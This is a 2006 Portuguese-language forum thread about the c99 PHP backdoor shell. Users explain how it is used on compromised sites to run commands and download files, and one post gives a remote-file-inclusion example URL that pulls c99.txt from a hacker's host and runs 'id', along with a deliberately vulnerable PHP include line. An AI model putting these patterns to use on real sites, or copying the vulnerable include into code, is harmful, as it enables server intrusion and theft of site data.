skin Posted July 31, 2006 at 12:33 PM Report #41276 Posted July 31, 2006 at 12:33 PM Eu li isto num fórum brasileiro e achei por bem trazer para aqui. Penso que isto não tem problemas de estar aqui, se tiver digam que eu elmino. Isto é possivel de fazer? vc precisa invadir de alguma forma o siteeu qndo entro num site costumo usar essa cmd http://bugs.275mb.com/c99.txt vc coloca esse arquvio dentro do servidor e acessa ele se tiver safe mode OFF vc seleciona todos os arquivos e manda copiar e depois clica em Pack buffer to archive algo assim e ai ele vai criar um arquivo .tar.gz ai vc faz download do site completo se quiser baixar apenas um arquivo.. eh soh clicar no link do download mas vc precisa invadir o site de alguma forma Our lives begin to end the day we become silent about things that matter - Martin Luther King
Anonym Posted July 31, 2006 at 01:10 PM Report #41283 Posted July 31, 2006 at 01:10 PM Não vejo grande utilidade nisso deve ser, mas como ele diz "é preciso invadir o site de alguma forma"
AriOps Posted July 31, 2006 at 01:32 PM Report #41293 Posted July 31, 2006 at 01:32 PM isso é um PHP.Backdoor. O antivirus apita logo. Cumps Daniel Correia
Guest id194 Posted July 31, 2006 at 02:57 PM Report #41326 Posted July 31, 2006 at 02:57 PM ao invadirmos o site ja n temos acesso ao mesmo? para que precisamos de um script para sacar os ficheiros? se ja hackamos o site, n é preciso script nenhum, basta sacar os files normalmente... penso eu...
skin Posted July 31, 2006 at 02:58 PM Author Report #41328 Posted July 31, 2006 at 02:58 PM Eu não sei simplesmente encontrei isto e queria saber mais informações sobre o mesmo. Our lives begin to end the day we become silent about things that matter - Martin Luther King
Destineo Posted July 31, 2006 at 04:40 PM Report #41349 Posted July 31, 2006 at 04:40 PM Há n forma de colocar um ficheiro num site. 1 delas é ter acesso ao site, outra é teres acesso a uma localização algures que te abre uma backdoor (que é o que o meu antivirus chamou a este script) para o servidor. O objectivo deste ficheiro é colocá-lo num site que não seja teu, porque não estou a ver ninguem a querer abrir o próprio site para ser feito o download. Como o fazes, tem a haver com o teu sentido de responsabilidade e ética. - Destineo
helt Posted August 5, 2006 at 04:55 PM Report #42488 Posted August 5, 2006 at 04:55 PM Ya, basta um formulário de upload, como os attachments nos fóruns por exemplo. Mas quanto a esse script... então mesmo conseguindo enviar para o servidor, tendo ele a extensão .txt, qual é o perigo? O .txt não é executável. A não ser que sirva para interagir com um script local... ––––•(-• [ ђєlt ] •-)•––––
kingless Posted August 5, 2006 at 07:33 PM Report #42506 Posted August 5, 2006 at 07:33 PM c99.txt é um ficheiro com código php que permite hackers efectuaram phpInjection em sites vulneraveis, o c99.txt permite o hacker atacar um site vulneravel e executar comandos no servidor onde o site vulneravel esta alojado, se a pasta public_html tiver a permissão 777 o hacker vai poder apagar, escrever e ler os ficheiros, (se não tiver a permissão 777 no dir public_html ele não pode sacar pode simplesmente ver o código) para sacar os ficheiros é preciso trocar as extensões dos ficheiros .php para .txt e sacar pela url ou então colocar num ficheiro .tar ou tar.gz ou zip ou rar e sacar pela url em forma de download normal. Exemplo: http://www.site_vulneravel.com/index.php?x=http://wwww.site_do_hacker.com/c99.txt?&xmd=id (Os comandos são executados onde esta bold) EDIT: Criei uma bug num ficheiro.php para mostrar como é que esse script funciona BUG: <?php include( $_GET['pagina'] ); ?>
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now